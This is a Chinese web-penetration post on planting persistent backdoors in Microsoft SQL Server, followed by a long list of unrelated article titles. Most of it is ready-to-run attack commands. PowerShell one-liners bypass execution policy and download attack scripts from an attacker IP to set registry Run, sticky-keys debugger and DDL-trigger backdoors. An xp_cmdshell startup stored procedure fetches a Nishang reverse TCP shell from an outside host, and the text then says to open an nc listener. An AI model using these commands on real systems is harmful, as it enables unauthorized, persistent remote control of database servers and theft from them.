WEB渗透权限维持篇-MSSQL后门

>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name Update -Command 'c:\windows\temp\Update.exe' -Instance "zone.com\sub2k8""

http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1
>powershell -ep bypass 
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1') 
>Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马脚本可用CS/Empire生成
>net stop mssqlserver
>net start mssqlserver

>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command "c:\windows\system32\cmd.exe" -Instance "zone.com\sub2k8""

>powershell -exec bypass 
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1') 
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')"  远程木马文件可用CS/Empire生成
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance " zone\sub2k8" -Remove   移除后门

http://eyupcelik.com.tr/guvenlik/493-mssql-fileless-rootkit-warsqlkit

>USE master
>GO

>wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1

修改下脚本的ip和端口
创建个web服务，把脚本传上去

创建存储过程
>CREATE PROCEDURE test_sp
>AS
>EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString(''http://192.168.1.2/Invoke-PowerShellTcpOneLine.ps1'')"'
>GO

设置服务器启动时立刻执行
EXEC sp_procoption @ProcName = 'test_sp'
, @OptionName = 'startup'
, @OptionValue = 'on';

设置完成，使用命令可以查到我们的存储过程
>SELECT * FROM sysobjects WHERE type = 'P' AND OBJECTPROPERTY ( id, 'ExecIsStartUp' ) = 1 ;

打开nc监听

重启后可以收到会话

相关文章：

北京网站建设多少钱？

辽宁网页制作哪家好_网站建设

高端品牌网站建设_汉中网站制作

memcmp函数的使用

基于Python实现一个庆祝中秋节的小程序

leetcode刷题day18|二叉树Part06（ 530.二叉搜索树的最小绝对差、501.二叉搜索树中的众数、236. 二叉树的最近公共祖先）

​经​纬​恒​润​二​面​​三​七​互​娱​一​面​​元​象​二​面​

演示：基于WPF的自绘的中国地铁轨道控件

相图的科学应用，陶瓷材料创新

Centos挂载和删除nfs

滑动窗口算法—字符串的排列

linux驱动开发-地址映射

uniapp小程序，使用腾讯地图获取定位

Vue组件：依赖注入provide和inject的使用

Python中的单例模式：从入门到精通

【秋招笔试】9.09阿里国际秋招(已改编)-三语言题解

Hadoop Pig

Vue3+setup+el-pagination+el-select封装下拉分页及懒加载

Dubbo 整合 Pinpoint 做分布式服务请求跟踪

java架构面试锦集：开源框架+并发+数据结构+大企必备面试题

Linux快速复制或删除大量小文件

python_bomb----数据类型总结

Vue小说阅读器（仿追书神器）

如何邀请好友注册您的网站(模拟百度网盘)

入手阿里云新服务器的部署NODE

使用SAX解析XML

小程序开发中的那些坑

智能合约Solidity教程-事件和日志（一）

06-01 点餐小程序前台界面搭建

回归生活：清理微信公众号

​业务双活的数据切换思路设计（下）

# Python csv、xlsx、json、二进制(MP3) 文件读写基本使用

#多叉树深度遍历_结合深度学习的视频编码方法--帧内预测

#进阶：轻量级ORM框架Dapper的使用教程与原理详解

#如何使用 Qt 5.6 在 Android 上启用 NFC

(php伪随机数生成)[GWCTF 2019]枯燥的抽奖

（ZT）一个美国文科博士的YardLife

（八）Flink Join 连接

(创新)基于VMD-CNN-BiLSTM的电力负荷预测—代码+数据

（二）构建dubbo分布式平台-平台功能导图

(附源码)springboot金融新闻信息服务系统 毕业设计651450

(附源码)springboot人体健康检测微信小程序 毕业设计 012142

（七）理解angular中的module和injector，即依赖注入

（深度全面解析）ChatGPT的重大更新给创业者带来了哪些红利机会

(已解决)Bootstrap精美弹出框模态框modal，实现js向modal传递数据

（已解决）报错：Could not load the Qt platform plugin “xcb“

（转）大道至简，职场上做人做事做管理

（转载）Linux网络编程入门

（最简单，详细，直接上手）uniapp/vue中英文多语言切换

.NET Core 版本不支持的问题

.NET 除了用 Task 之外，如何自己写一个可以 await 的对象？

.Net 基于MiniExcel的导入功能接口示例

.NET/C# 异常处理：写一个空的 try 块代码，而把重要代码写到 finally 中（Constrained Execution Regions）

.Net高阶异常处理第二篇~~ dump进阶之MiniDumpWriter

@Controller和@RestController的区别？

[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)

[]指针

[Algorithm][动态规划][路径问题][不同路径][不同路径Ⅱ][珠宝的最高价值]详细讲解